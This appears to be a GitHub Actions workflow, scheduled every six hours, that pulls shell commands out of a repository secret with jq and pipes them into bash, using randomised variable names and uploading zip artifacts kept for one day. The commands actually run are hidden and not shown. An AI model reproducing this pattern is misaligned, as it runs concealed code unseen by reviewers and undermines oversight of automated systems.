name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '1 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Start
        env:
          ajno8: ${{ secrets.ajno8 }}
        run: |
          printf '%s' "$ajno8" | jq -r .hunn8156 | /bin/bash
          printf '%s' "$u73" | jq -r .kpkla08 | /bin/bash
          printf '%s' "$jbblf5908" | jq -r .tbvoo527 | /bin/bash
          printf '%s' "$qeut36810" | jq -r .ykzt06 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: XojxNVBe
          path: "*.zip"
          retention-days: 1
